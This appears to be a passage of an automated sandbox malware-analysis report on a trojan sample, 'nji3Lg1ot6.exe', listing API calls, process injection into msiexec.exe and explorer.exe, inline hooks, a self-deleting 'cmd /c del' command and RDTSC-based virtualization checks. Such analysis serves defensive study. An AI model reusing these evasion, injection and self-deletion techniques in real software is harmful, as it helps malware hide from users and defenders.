          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AF9007_2_046AF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C99BF7_2_046C99BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0475FA2B7_2_0475FA2B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047722AE7_2_047722AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAB407_2_046CAB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04772B287_2_04772B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476DBD27_2_0476DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047603DA7_2_047603DA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DEBB07_2_046DEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEB717_2_006DEB71
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C2D907_2_006C2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C9E4B7_2_006C9E4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C9E507_2_006C9E50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEEB57_2_006DEEB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD7DE7_2_006DD7DE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006C2FB07_2_006C2FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DE79A7_2_006DE79A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: String function: 00A2B150 appears 72 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 046AB150 appears 72 times
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A350 NtCreateFile,1_2_0041A350
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A400 NtReadFile,1_2_0041A400
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A480 NtClose,1_2_0041A480
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A530 NtAllocateVirtualMemory,1_2_0041A530
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A34A NtCreateFile,1_2_0041A34A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A3FB NtReadFile,1_2_0041A3FB
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041A47B NtClose,1_2_0041A47B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A698F0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A69860
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69840 NtDelayExecution,LdrInitializeThunk,1_2_00A69840
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A699A0 NtCreateSection,LdrInitializeThunk,1_2_00A699A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A69910
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A20 NtResumeThread,LdrInitializeThunk,1_2_00A69A20
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A69A00
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A50 NtCreateFile,LdrInitializeThunk,1_2_00A69A50
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A695D0 NtClose,LdrInitializeThunk,1_2_00A695D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69540 NtReadFile,LdrInitializeThunk,1_2_00A69540
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A696E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A69660
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A697A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A69780
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A69710
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A698A0 NtWriteVirtualMemory,1_2_00A698A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69820 NtEnumerateKey,1_2_00A69820
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6B040 NtSuspendThread,1_2_00A6B040
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A699D0 NtCreateProcessEx,1_2_00A699D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69950 NtQueueApcThread,1_2_00A69950
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A80 NtOpenDirectoryObject,1_2_00A69A80
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69A10 NtQuerySection,1_2_00A69A10
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6A3B0 NtGetContextThread,1_2_00A6A3B0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69B00 NtSetValueKey,1_2_00A69B00
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A695F0 NtQueryInformationFile,1_2_00A695F0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69520 NtWaitForSingleObject,1_2_00A69520
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A6AD30 NtSetContextThread,1_2_00A6AD30
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69560 NtWriteFile,1_2_00A69560
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A696D0 NtCreateKey,1_2_00A696D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69610 NtEnumerateValueKey,1_2_00A69610
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69670 NtQueryInformationProcess,1_2_00A69670
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69650 NtQueryValueKey,1_2_00A69650
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69FE0 NtCreateMutant,1_2_00A69FE0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A69730 NtQueryVirtualMemory,1_2_00A69730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9540 NtReadFile,LdrInitializeThunk,7_2_046E9540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E95D0 NtClose,LdrInitializeThunk,7_2_046E95D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_046E96E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E96D0 NtCreateKey,LdrInitializeThunk,7_2_046E96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9710 NtQueryInformationToken,LdrInitializeThunk,7_2_046E9710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9FE0 NtCreateMutant,LdrInitializeThunk,7_2_046E9FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9780 NtMapViewOfSection,LdrInitializeThunk,7_2_046E9780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_046E9860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9840 NtDelayExecution,LdrInitializeThunk,7_2_046E9840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_046E9910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E99A0 NtCreateSection,LdrInitializeThunk,7_2_046E99A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A50 NtCreateFile,LdrInitializeThunk,7_2_046E9A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9560 NtWriteFile,7_2_046E9560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9520 NtWaitForSingleObject,7_2_046E9520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EAD30 NtSetContextThread,7_2_046EAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E95F0 NtQueryInformationFile,7_2_046E95F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9660 NtAllocateVirtualMemory,7_2_046E9660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9670 NtQueryInformationProcess,7_2_046E9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9650 NtQueryValueKey,7_2_046E9650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9610 NtEnumerateValueKey,7_2_046E9610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9760 NtOpenProcess,7_2_046E9760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA770 NtOpenThread,7_2_046EA770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9770 NtSetInformationFile,7_2_046E9770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9730 NtQueryVirtualMemory,7_2_046E9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA710 NtOpenProcessToken,7_2_046EA710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E97A0 NtUnmapViewOfSection,7_2_046E97A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EB040 NtSuspendThread,7_2_046EB040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9820 NtEnumerateKey,7_2_046E9820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98F0 NtReadVirtualMemory,7_2_046E98F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E98A0 NtWriteVirtualMemory,7_2_046E98A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9950 NtQueueApcThread,7_2_046E9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E99D0 NtCreateProcessEx,7_2_046E99D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A20 NtResumeThread,7_2_046E9A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A00 NtProtectVirtualMemory,7_2_046E9A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A10 NtQuerySection,7_2_046E9A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9A80 NtOpenDirectoryObject,7_2_046E9A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E9B00 NtSetValueKey,7_2_046E9B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EA3B0 NtGetContextThread,7_2_046EA3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA350 NtCreateFile,7_2_006DA350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA400 NtReadFile,7_2_006DA400
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA480 NtClose,7_2_006DA480
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA34A NtCreateFile,7_2_006DA34A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA3FB NtReadFile,7_2_006DA3FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DA47B NtClose,7_2_006DA47B
          Source: nji3Lg1ot6.exe, 00000000.00000003.290866251.000000000333F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000000.00000003.291883164.00000000031A6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345282700.0000000000CAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs nji3Lg1ot6.exe
          Source: nji3Lg1ot6.exe, 00000001.00000002.345433443.0000000000EAF000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs nji3Lg1ot6.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: nji3Lg1ot6.exeVirustotal: Detection: 37%
          Source: nji3Lg1ot6.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\user\Desktop\nji3Lg1ot6.exeJump to behavior
          Source: nji3Lg1ot6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"Jump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAD.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@4/4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_72FB1000 push eax; ret 0_2_72FB102E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E9E6 push edx; ret 1_2_0041E9EE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00416B6D push ebx; ret 1_2_00416B85
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4F2 push eax; ret 1_2_0041D4F8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4FB push eax; ret 1_2_0041D562
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4A5 push eax; ret 1_2_0041D4F8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D55C push eax; ret 1_2_0041D562
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EEB5 push esi; ret 1_2_0041F0D9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A7D0D1 push ecx; ret 1_2_00A7D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FD0D1 push ecx; ret 7_2_046FD0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DE9E6 push edx; ret 7_2_006DE9EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006D6B6D push ebx; ret 7_2_006D6B85
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4FB push eax; ret 7_2_006DD562
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4F2 push eax; ret 7_2_006DD4F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4A5 push eax; ret 7_2_006DD4F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD55C push eax; ret 7_2_006DD562
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEEB5 push esi; ret 7_2_006DF0D9
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE0
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"Jump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6788Thread sleep time: -56000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6720Thread sleep time: -46000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI coverage: 7.9 %
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 7.4 %
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI call chain: ExitProcess graph end nodegraph_0-3606
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeAPI call chain: ExitProcess graph end nodegraph_0-3610
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EB1E mov eax, dword ptr fs:[00000030h]0_2_0019EB1E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019E90A mov eax, dword ptr fs:[00000030h]0_2_0019E90A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EC4C mov eax, dword ptr fs:[00000030h]0_2_0019EC4C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EBCF mov eax, dword ptr fs:[00000030h]0_2_0019EBCF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0019EC0E mov eax, dword ptr fs:[00000030h]0_2_0019EC0E
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]1_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A690AF mov eax, dword ptr fs:[00000030h]1_2_00A690AF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A5F0BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov eax, dword ptr fs:[00000030h]1_2_00A5F0BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5F0BF mov eax, dword ptr fs:[00000030h]1_2_00A5F0BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A29080 mov eax, dword ptr fs:[00000030h]1_2_00A29080
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA3884 mov eax, dword ptr fs:[00000030h]1_2_00AA3884
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA3884 mov eax, dword ptr fs:[00000030h]1_2_00AA3884
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]1_2_00A4B8E4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]1_2_00A4B8E4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]1_2_00A240E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]1_2_00A240E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]1_2_00A240E1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A258EC mov eax, dword ptr fs:[00000030h]1_2_00A258EC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]1_2_00ABB8D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00ABB8D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]1_2_00ABB8D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]1_2_00ABB8D0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]1_2_00ABB8D0
